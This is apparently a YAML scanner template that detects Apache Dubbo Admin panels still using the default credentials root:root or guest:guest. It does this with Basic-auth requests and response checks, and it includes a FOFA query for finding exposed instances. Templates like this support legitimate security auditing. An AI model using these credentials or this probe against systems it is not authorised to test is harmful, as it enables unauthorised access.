id: dubbo-admin-default-password

info:
    name: Dubbo Admin Default Password
    author: ritikchaddha
    severity: high
    verified: true
    description: |
        Apache Dubbo default admin credentials were discovered.
        FOFA: app="APACHE-dubbo"
    reference:
        - https://www.cnblogs.com/wishwzp/p/9438658.html
    tags: dubbo,apache,default-login
    created: 2023/06/24

set:
    root: "base64('root:root')"
    guest: "base64('guest:guest')"
rules:
    r0:
        request:
            method: GET
            path: /
            headers:
                Authorization: Basic {{root}}
        expression: |
            response.status == 200 && 
            response.body.ibcontains(b"<title>Dubbo Admin</title>") && 
            response.body.bcontains(b"'/logout'") && 
            response.body.bcontains(b"/sysinfo/versions")
    r1:
        request:
            method: GET
            path: /
            headers:
                Authorization: Basic {{guest}}
        expression: |
            response.status == 200 && 
            response.body.ibcontains(b"<title>Dubbo Admin</title>") && 
            response.body.bcontains(b"'/logout'") && 
            response.body.bcontains(b"/sysinfo/versions")
expression: r0() || r1()
